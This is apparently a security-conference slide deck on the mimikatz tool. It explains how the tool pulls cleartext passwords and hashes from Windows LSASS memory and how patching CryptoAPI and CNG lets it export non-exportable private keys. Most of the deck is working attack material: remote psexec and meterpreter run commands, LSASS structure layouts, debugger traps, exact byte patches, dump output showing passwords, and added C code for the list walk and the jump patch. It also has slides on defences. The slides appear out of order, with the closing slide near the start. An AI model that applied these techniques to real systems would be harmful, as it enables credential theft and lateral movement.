  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit

  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password:
  - exported PFX files are protected by this password: mimikatz

Keys:
  - When you import a certificate several times, exportable or not, Windows creates duplicate keys.
  - When you delete a certificate, Windows does not delete its private key… funny, isn't it?
    * So yes, mimikatz can still export it.
mimikatz / crypto: what we can do

Exactly the same as for sekurlsa: prevent attacker access to the accounts and the computer holding the keys: no admin, no admin, no admin…

Basics:
  - Use smartcards/tokens for user certificates
  - Use Hardware Security Modules (HSM), even SoftHSM

More in depth:
  - See what Microsoft can do with the TPM from Windows 8
    * Virtual Smart Card seems promising
  - Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
    * Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?

  - Play with minesweeper
  - Manipulate some handles
  - Pass the hash
  - Dump SAM / AD
  - Stop event monitoring
  - Patch Terminal Server
  - Basic GPO bypass
  - AppLocker / SRP bypass
  - Driver:
    * Play with tokens & privileges
    * Display SSDT, x86 & x64
    * List minifilter actions
    * List notifications (process, thread, image, registry)
    * List object hooks and procedures
    * …
  - …
mimikatz: that's all folks!

Thanks to / Merci à:
  - my girlfriend, for her support (her LSASS crashed a few times)
  - Application Security Forum, for offering me this great opportunity
    * Partners and sponsors too, for sure
  - Microsoft, for always considering this as normal/acceptable
  - Security friends/community, for their ideas & challenges
    * nagual, newsoft, mubix, …
  - You, for your attention

Questions? Don't be shy ;)
  … especially if you have written down the corresponding slide number.
Blog, Source Code & Contact

  blog:     http://blog.gentilkiwi.com
  mimikatz: http://blog.gentilkiwi.com/mimikatz
  source:   https://code.google.com/p/mimikatz
  email:    benjamin@gentilkiwi.com
mimikatz / sekurlsa / livessp: how?

Actually, I've only used a logical (empirical) approach to search for passwords…
  - Protocol reading
  - Symbols searching

~ Boring ~… let's be more brutal this time: make a WinDBG trap!

Switch the kernel debugger into the lsass.exe context, load user symbols, and break on lsasrv!LsaProtectMemory so that each time anything in LSASS protects a secret we get the top five frames of the caller and then continue:

  0: kd> !process 0 0 lsass.exe
  PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
      DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
      Image: lsass.exe

  0: kd> .process /i 83569040
  You need to continue execution (press 'g' <enter>) for the context
  to be switched. When the debugger breaks in again, you will be in
  the new process context.
  0: kd> g
  Break instruction exception - code 80000003 (first chance)
  nt!RtlpBreakWithStatusInstruction:
  814b39d0 cc              int     3
  0: kd> .reload /user
  Loading User Symbols
  0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
  0: kd> g
mimikatz / sekurlsa / livessp: how?

Let's log in with a Live account on Windows 8.

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert the data in LiveGlobalLogonSessionList (similar to WDigest).

The trap fires three times during the logon ("kc 5" at each lsasrv!LsaProtectMemory hit):

  lsasrv!LsaProtectMemory
  livessp!LiveMakeSupplementalCred
  livessp!LiveMakeSecPkgCredentials
  livessp!LsaApLogonUserEx2            <- our LiveSSP provider
  livessp!SpiLogonUserEx2

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials

  1: kd> uf /c livessp!LsaApLogonUserEx2
  livessp!LsaApLogonUserEx2 (74781536)
    [...]
    livessp!LsaApLogonUserEx2+0x560 (74781a96):
      call to livessp!LiveCreateLogonSession (74784867)

  - Yeah! Pass the Hash capability with Live accounts too… (msv1_0 keeps the NTLM hash)
  - Live users can log on through RDP via SSO (tspkg keeps the password)
mimikatz / sekurlsa / livessp: workflow

  [Diagram] LsaEnumerateLogonSessions -> for each LUID -> search livessp!LiveGlobalLogonSessionList (linked list) for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL) -> LsaUnprotectMemory -> password in clear

  typedef struct _KIWI_LIVESSP_LIST_ENTRY {
      struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
      struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      PVOID unk3;
      DWORD unk4;
      DWORD unk5;
      PVOID unk6;
      LUID LocallyUniqueIdentifier;
      LSA_UNICODE_STRING UserName;
      PVOID unk7;
      PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
  } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

  typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
      DWORD isSupp;
      DWORD unk0;
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz / sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?

Me, yes!
mimikatz / sekurlsa / kerberos

Let's log in with a normal account.

After credentials protection, KerbCreateLogonSession calls:
  - NT6: KerbInsertOrLocateLogonSession, to insert the data in KerbGlobalLogonSessionTable
  - NT5: KerbInsertLogonSession, to insert the data in KerbLogonSessionList

Stacks caught by the trap ("kc 5" at each lsasrv!LsaProtectMemory hit):

  lsasrv!LsaProtectMemory
  kerberos!KerbHideKey                 <- Kerberos ticket part? Maybe ;)
  kerberos!KerbCreatePrimaryCredentials
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  kerberos!KerbHidePassword            <- Kerberos part for the password
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  wdigest!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials
mimikatz / sekurlsa / kerberos (nt6): workflow

  [Diagram] LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

  typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
      DWORD unk0;
      PVOID unk1;
      PVOID unk2;
      PVOID unk3;
  #ifdef _M_X64
      BYTE unk4[32];
  #elif defined _M_IX86
      BYTE unk4[20];
  #endif
      LUID LocallyUniqueIdentifier;
  #ifdef _M_X64
      BYTE unk5[44];
  #elif defined _M_IX86
      BYTE unk5[36];
  #endif
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz / sekurlsa / kerberos (nt5): workflow

  [Diagram] LsaEnumerateLogonSessions -> for each LUID -> search kerberos!KerbLogonSessionList (linked list) for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear

  typedef struct _KIWI_KERBEROS_LOGON_SESSION {
      struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
      struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
      DWORD UsageCount;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      DWORD unk3;
      DWORD unk4;
      PVOID unk5;
      PVOID unk6;
      PVOID unk7;
      LUID LocallyUniqueIdentifier;
  #ifdef _M_IX86
      DWORD unk8;
  #endif
      DWORD unk9;
      DWORD unk10;
      PVOID unk11;
      DWORD unk12;
      DWORD unk13;
      PVOID unk14;
      PVOID unk15;
      PVOID unk16;
      [...]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
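The LUID lookup that the two linked-list workflows above (livessp!LiveGlobalLogonSessionList and kerberos!KerbLogonSessionList) perform, as an added example that is not part of the original slides or of mimikatz. It builds a LIST_ENTRY-style list from constructed data, walks it once for each LUID a caller would have obtained from LsaEnumerateLogonSessions, and returns the supplemental credential block. The Windows types are stand-in typedefs and the unk* padding fields are dropped, so offsets differ from the real structures; the password stays as the protected blob, since decrypting it needs the LSASS keys covered later.

```c
/* Added example (not mimikatz source): "search linked list for LUID" run on a
 * list built in-process instead of LSASS memory. Windows types are stand-in
 * typedefs; the page's unk* padding fields are omitted (changes offsets only). */
#include <stddef.h>
#include <stdint.h>
#include <wchar.h>

typedef struct _LUID { uint32_t LowPart; int32_t HighPart; } LUID;

typedef struct _LSA_UNICODE_STRING {
    uint16_t Length;        /* in bytes, not characters */
    uint16_t MaximumLength;
    wchar_t *Buffer;        /* 2-byte WCHAR on Windows, wchar_t here */
} LSA_UNICODE_STRING;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    uint32_t isSupp;
    uint32_t unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;   /* LsaProtectMemory output while in LSASS */
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

/* LiveGlobalLogonSessionList is a LIST_ENTRY head: Flink points at the first
 * entry and the last entry's Flink points back at the head. The head is not an
 * entry, so the walk stops when it comes back around to it. */
static PKIWI_LIVESSP_LIST_ENTRY
find_session_by_luid(const KIWI_LIVESSP_LIST_ENTRY *head, LUID luid)
{
    for (PKIWI_LIVESSP_LIST_ENTRY e = head->Flink; e != head; e = e->Flink)
        if (e->LocallyUniqueIdentifier.LowPart == luid.LowPart &&
            e->LocallyUniqueIdentifier.HighPart == luid.HighPart)
            return e;
    return NULL;
}

/* Character count of an LSA_UNICODE_STRING (Length is in bytes). */
static size_t ustr_chars(const LSA_UNICODE_STRING *u)
{
    return u->Length / sizeof(wchar_t);
}

static LSA_UNICODE_STRING ustr(wchar_t *s)
{
    LSA_UNICODE_STRING u;
    u.Length = (uint16_t)(wcslen(s) * sizeof(wchar_t));
    u.MaximumLength = (uint16_t)(u.Length + sizeof(wchar_t));
    u.Buffer = s;
    return u;
}

/* Constructed sample (not a real dump): head plus three sessions. Only the
 * interactive Live logon carries supplemental credentials; SYSTEM (0x3e7) and a
 * network logon have none, which is what the "LUID KO" line for livessp means. */
static KIWI_LIVESSP_LIST_ENTRY *sample_list(void)
{
    static wchar_t user[] = L"Gentil Kiwi", dom[] = L"vm-w8-rp-x", sys[] = L"SYSTEM";
    static wchar_t blob[] = L"<LsaProtectMemory ciphertext>";   /* placeholder bytes */
    static KIWI_LIVESSP_PRIMARY_CREDENTIAL creds;
    static KIWI_LIVESSP_LIST_ENTRY head, e[3];
    static int built;
    if (built) return &head;

    creds.isSupp = 1;
    creds.UserName = ustr(user);
    creds.Domaine = ustr(dom);
    creds.Password = ustr(blob);   /* still encrypted until LsaUnprotectMemory */

    e[0].LocallyUniqueIdentifier = (LUID){ 0x3e7, 0 };      /* SYSTEM */
    e[0].UserName = ustr(sys);
    e[1].LocallyUniqueIdentifier = (LUID){ 0x3958f6, 0 };   /* interactive Live logon */
    e[1].UserName = ustr(user);
    e[1].suppCreds = &creds;
    e[2].LocallyUniqueIdentifier = (LUID){ 0x3a0c21, 0 };   /* network logon, no creds */
    e[2].UserName = ustr(user);

    head.Flink = &e[0]; e[0].Blink = &head;   /* head <-> e0 <-> e1 <-> e2 <-> head */
    e[0].Flink = &e[1]; e[1].Blink = &e[0];
    e[1].Flink = &e[2]; e[2].Blink = &e[1];
    e[2].Flink = &head; head.Blink = &e[2];
    built = 1;
    return &head;
}

/* Credentials attached to a LUID, or NULL when the session has none. */
static PKIWI_LIVESSP_PRIMARY_CREDENTIAL creds_for_luid(uint32_t low)
{
    PKIWI_LIVESSP_LIST_ENTRY e = find_session_by_luid(sample_list(), (LUID){ low, 0 });
    return e ? e->suppCreds : NULL;
}

int main(void)
{
    /* Stand-in for the LUIDs LsaEnumerateLogonSessions() would return. */
    const uint32_t luids[] = { 0x3e7, 0x3958f6, 0x3a0c21, 0xdead };
    for (size_t i = 0; i < sizeof luids / sizeof luids[0]; i++) {
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL c = creds_for_luid(luids[i]);
        if (c)
            wprintf(L"0;%u  %ls\\%ls  protected password: %zu chars\n", luids[i],
                    c->Domaine.Buffer, c->UserName.Buffer, ustr_chars(&c->Password));
        else
            wprintf(L"0;%u  livessp: n.t. (LUID KO)\n", luids[i]);
    }
    return 0;
}
```

Against real LSASS memory the same loop reads each entry with ReadProcessMemory and must stop on a NULL or out-of-range Flink as well as on the head, because a partially initialised or freed entry ends the list early.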
mimikatz / sekurlsa: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz / sekurlsa / kerberos: "hu?"

OK! It works… But why?
  - Not at every logon on NT5 (it can need a lock/unlock)

From my understanding of Microsoft's explanations:
  - no need of passwords for the Kerberos protocol…
  - all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logical…
  - For password auth:
    * the password hash is the shared secret, but the password is kept in memory
  - For full smartcard auth:
    * No password on the client
    * No hash on the client
      - …but the NTLM hash is on the client anyway
      - the KDC sent it back as a gift
mimikatz / sekurlsa

All passwords in memory are encrypted, but in a reversible way, so that they can be used.

We used LsaUnprotectMemory in the LSASS context to decrypt them.
  - This function relies on LsaEncryptMemory from lsasrv.dll

For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.

Can it be fun to decrypt outside the process?
  - Yes it is… no more injection, just reading the memory of the LSASS process…

mimikatz can load lsasrv.dll too and "import" the keys LSASS initialized:
  - When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are in LSASS.
mimikatz / sekurlsa / LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
  - RC4
  - DESx

  [Diagram] lsasrv.dll globals inside lsass, copied by mimikatz into its own loaded lsasrv.dll:
    g_cbRandomKey  DWORD  (256)
    g_pRandomKey   BYTE[g_cbRandomKey]
    g_pDESXKey     BYTE[144]
    g_Feedback     BYTE[8]
mimikatz / sekurlsa / LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
  - 3DES
  - AES

  [Diagram] lsasrv.dll globals inside lsass, copied by mimikatz: InitializationVector BYTE[16], h3DesKey and hAesKey (handles pointing to a KIWI_BCRYPT_KEY, whose cle member points to the KIWI_BCRYPT_KEY_DATA holding the raw key)

  typedef struct _KIWI_BCRYPT_KEY {
      DWORD size;
      DWORD type;
      PVOID unk0;
      PKIWI_BCRYPT_KEY_DATA cle;
      PVOID unk1;
  } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

  typedef struct _KIWI_BCRYPT_KEY_DATA {
      DWORD size;
      DWORD tag;
      DWORD type;
      DWORD unk0;
      DWORD unk1;
      DWORD unk2;
      DWORD unk3;
      PVOID unk4;
      BYTE data;   /* etc. */
  } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz / sekurlsa: memo

Security Packages:

  Package          Symbol                                                  Type
  tspkg            tspkg!TSGlobalCredTable                                 RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                                   LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList                      LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList                           LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                    RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount  LIST_ENTRY / ULONG

Protection Keys:

  Key     NT 5 symbols
  RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key     NT 6 symbols
  (IV)    lsasrv!InitializationVector
  3DES    lsasrv!h3DesKey
  AES     lsasrv!hAesKey
mimikatz / sekurlsa: memo

Some commands:

  mimikatz privilege::debug sekurlsa::logonPasswords full exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit

  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

Output (French messages translated):

  mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

  mimikatz # privilege::debug
  Request to ENABLE privilege : SeDebugPrivilege : OK

  mimikatz # sekurlsa::logonPasswords full

  Authentication Id         : 0;234870
  Authentication package    : NTLM
  Primary user              : Gentil Kiwi
  Authentication domain     : vm-w8-rp-x
        msv1_0 :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * LM hash   : d0e9aee149655a6075e4540af1f22d3b
         * NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234/
        wdigest :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234/
        tspkg :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234/
        livessp :
         * n.t. (LUID KO)
mimikatz / sekurlsa: what we can do

Basics:
  - No physical access to the computer (first step to pass the hash, then to pass the pass)
  - No admin rights / system rights / debug privileges (…)
  - Disable local admin accounts
  - Strong passwords (haha, it was a joke: useless here ;))
  - For privileged accounts, network logon instead of interactive (when possible)
  - Audit: pass the hash leaves traces and can lock accounts
  - No admin rights / system rights / debug privileges, even for VIPs
  - Use a separate network (or forest) for privileged tasks

More in depth:
  - Force strong authentication (SmartCard & Token) $ €
  - Short validity for Kerberos tickets
  - No delegation
  - Disable NTLM (available with NT6)
  - No exotic:
    * biometrics (it keeps the password somewhere and pushes it to Windows)
    * single sign-on
  - Stop shared secrets for authentication, push public/private stuff (like keys ;))
  - Take every opportunity to stop retro-compatibility
  - Disable faulty providers
    * Is it supported by Microsoft?
    * Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz / crypto: what is it?

A little module that I wrote to:
  - play with the Windows Cryptographic API, CNG and RSA keys
  - automate the export of certificates/keys
    * even those which are "not" exportable

What the crypto module can do:
  - List:
    * Providers
    * Stores
    * Certificates
    * Keys
  - Export:
    * Certificates
      - public part in DER format
      - with private key in PFX format
    * Private keys in PVK format
      - it's cool, OpenSSL can deal with it too
  - Patch:
    * CryptoAPI, in the mimikatz context
    * CNG, in the LSASS context (again ;))

(module: mod_mimikatz_crypto)
mimikatz / crypto: how it's protected

Private keys are DPAPI protected:
  - You cannot reuse private key files on another computer
    * at least not without the master keys and/or the users' passwords
  - Computers/users can load their own keys because they have enough secrets to do it (e.g. an opened session)
    * Yes, a computer/server opens a "session" too

Export/usage can be limited by:
  - Password   } constraints for most users,
  - Popup      } unavailable for computer keys
  - Export/Archive flag not present

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz / crypto / capi: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
  - http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your-app-here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
  - cryptdll.dll, rsaenh.dll, …

Processes deal with cryptographic keys through this API…

mimikatz / crypto / capi: how it's exported

  [Diagram] Process -> CryptoAPI and RSA CSP (loaded in the same process) -> Ask to export Key -> Load Private Key -> DPAPI Decode -> PLAYSKOOL -> Exportable? yes: Exported Key / no: NTE_BAD_KEY_STATE
mimikatz / crypto / patchcapi: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.

This function does all the work to prepare the export, and checks if the key is exportable (French messages translated below):

  mimikatz # crypto::exportCertificates
  Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
    - Benjamin Delpy
        Key Container  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportable     : NO
        Key size       : 2048
        Private export : CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx : KO (0x8009000b) Key not valid for use in specified state.
        Public export  : CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der : OK

  ================ Certificate 0 ================
  Serial Number: 112169417a1c3ef46a301f99385f50680fa0
  Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Subject: CN=Benjamin Delpy, C=FR
  Non-root Certificate
  Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider = Microsoft Enhanced Cryptographic Provider v1.0
  Private key is NOT exportable
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.

Both tools stop at the same "Exportable?" check inside the CSP.
mimikatz / crypto / patchcapi: because I own my process

So what? A module in my own process tells me I can't do something? CryptoAPI is in my memory space: let's patch it!

I wrote "4" bytes in my memory space: at each of the two checks, the conditional jump becomes an unconditional one.

  before:
  .text:0AC0B7CB   0F 85 33 C7 FF FF   jnz   continue_key_export_or_archive
  after:
  .text:0AC0B7CB   90                  nop
  .text:0AC0B7CC   E9 33 C7 FF FF      jmp   continue_key_export_or_archive

  before:
  .text:0AC1F749   0F 85 B6 3B FF FF   jnz   continue_key_export_or_archive_prepare
  after:
  .text:0AC1F749   90                  nop
  .text:0AC1F74A   E9 B6 3B FF FF      jmp   continue_key_export_or_archive_prepare
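The two-byte rewrite behind crypto::patchcapi, as an added example that is not from the slides or from mimikatz. It applies the jnz-to-nop;jmp change to a private copy of the six bytes listed above (addresses taken from the listing, a little-endian host assumed for the rel32 decode) and checks why the four displacement bytes can stay untouched: the jmp starts one byte after the jnz and is one byte shorter, so both instructions end at the same address and the same rel32 reaches the same label.

```c
/*
 * Added example (not mimikatz source): jnz rel32 -> nop; jmp rel32 on a copy of
 * the bytes from the listing above, with a check that the branch target is
 * preserved. Assumes a little-endian host (x86) for the displacement decode.
 */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Destination of a 6-byte near jcc (0F 8x rel32) or a 5-byte near jmp
 * (E9 rel32) whose first byte sits at `va`. Anything else decodes to 0. */
static uint32_t branch_target(const uint8_t *code, uint32_t va)
{
    int32_t rel;
    if (code[0] == 0x0F && (code[1] & 0xF0) == 0x80) {   /* jcc rel32 */
        memcpy(&rel, code + 2, 4);
        return va + 6 + (uint32_t)rel;
    }
    if (code[0] == 0xE9) {                               /* jmp rel32 */
        memcpy(&rel, code + 1, 4);
        return va + 5 + (uint32_t)rel;
    }
    return 0;
}

/* "0F 85 rel32" (jnz) -> "90 E9 rel32" (nop; jmp). Only the two opcode bytes
 * change: the jmp starts one byte later and is one byte shorter, so it ends
 * where the jnz did and the same rel32 reaches the same target.
 * Returns 0 on success, -1 if the bytes are not a jnz rel32. */
static int patch_jnz_to_jmp(uint8_t *code)
{
    if (code[0] != 0x0F || code[1] != 0x85)
        return -1;
    code[0] = 0x90;   /* nop */
    code[1] = 0xE9;   /* jmp rel32 */
    return 0;
}

/* Patch a copy of `orig` and report whether control flow still lands on the
 * same address. Returns 1 when it does, 0 otherwise. */
static int patch_keeps_target(const uint8_t orig[6], uint32_t va,
                              uint32_t *before, uint32_t *after)
{
    uint8_t buf[6];
    memcpy(buf, orig, 6);
    *before = branch_target(buf, va);
    if (patch_jnz_to_jmp(buf) != 0)
        return 0;
    *after = branch_target(buf + 1, va + 1);   /* jmp now begins after the nop */
    return *before == *after;
}

/* The two sites from the listing above (rsaenh.dll, .text virtual addresses). */
static const uint8_t  SITE1[6] = { 0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF };
static const uint32_t SITE1_VA = 0x0AC0B7CBu;
static const uint8_t  SITE2[6] = { 0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF };
static const uint32_t SITE2_VA = 0x0AC1F749u;

uint32_t site1_target_before(void) { return branch_target(SITE1, SITE1_VA); }
int site1_patch_keeps_target(void) { uint32_t b, a; return patch_keeps_target(SITE1, SITE1_VA, &b, &a); }
int site2_patch_keeps_target(void) { uint32_t b, a; return patch_keeps_target(SITE2, SITE2_VA, &b, &a); }

/* A short "jz rel8" (74 xx) is not the encoding we patch: refuse it. */
int patch_rejects_non_jnz(void)
{
    uint8_t not_jnz[6] = { 0x74, 0x05, 0x90, 0x90, 0x90, 0x90 };
    return patch_jnz_to_jmp(not_jnz) == -1;
}

int main(void)
{
    uint32_t b, a;
    patch_keeps_target(SITE1, SITE1_VA, &b, &a);
    printf(".text:%08X  jnz -> %08X   nop;jmp -> %08X  (%s)\n", SITE1_VA, b, a, b == a ? "same" : "DIFFERENT");
    patch_keeps_target(SITE2, SITE2_VA, &b, &a);
    printf(".text:%08X  jnz -> %08X   nop;jmp -> %08X  (%s)\n", SITE2_VA, b, a, b == a ? "same" : "DIFFERENT");
    return 0;
}
```

Patching the loaded module rather than a copy additionally needs the code page made writable and the site located by byte pattern, since the .text addresses above move with the module base.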
mimikatz / crypto / patchcapi: demo time

Import, export, import as not exportable… export!
mimikatz / crypto / patchcapi: limitations

Because:
  - I'm lazy
  - I've seen RSA keys in the majority of real-life cases
    * Elliptic Curve, a little…

mimikatz crypto::patchcapi only deals with:
  - Microsoft Base Cryptographic Provider v1.0
  - Microsoft Enhanced Cryptographic Provider v1.0
  - Microsoft Enhanced RSA and AES Cryptographic Provider
  - Microsoft RSA SChannel Cryptographic Provider
  - Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz / crypto / cng: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
  - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.

Processes use RPC to call the "Key Isolation service" (keyiso) functions.

It seems more secure than CryptoAPI…
  - It is, but it's not perfect…
mimikatz / crypto / cng: how it's exported

  [Diagram] Process -> CNG -> RPC -> KeyIso service (in the LSASS process: on NT6 a System process protected by ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP) -> Ask to export Key -> Load Private Key -> DPAPI Decode -> PLAYSKOOL -> Exportable? yes: Exported Key (back over RPC) / no: NTE_NOT_SUPPORTED
mimikatz crypto / patchcng: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey inside lsass (KeyIso). This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportKeys [user]
CNG keys:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
   Exportability : NO
   Key size      : 2048
   Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
   mod_crypto_ng::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) : The requested operation is not supported.

This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210  75 1C    jnz short continue_key_export
.text:6C815210  EB 1C    jmp short continue_key_export
mimikatz crypto / patchcng: demo time

Import, export, import as not exportable… export again!
mimikatz crypto / patchcng: limitations

The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…

mimikatz crypto / patchcng: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports:
– until reboot / KeyIso service restart

Some other programs that don't check the export flag themselves before asking for the export work too:
– yeah, like the good old certutil
Before the patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
  Private key is NOT exportable
Encryption test passed
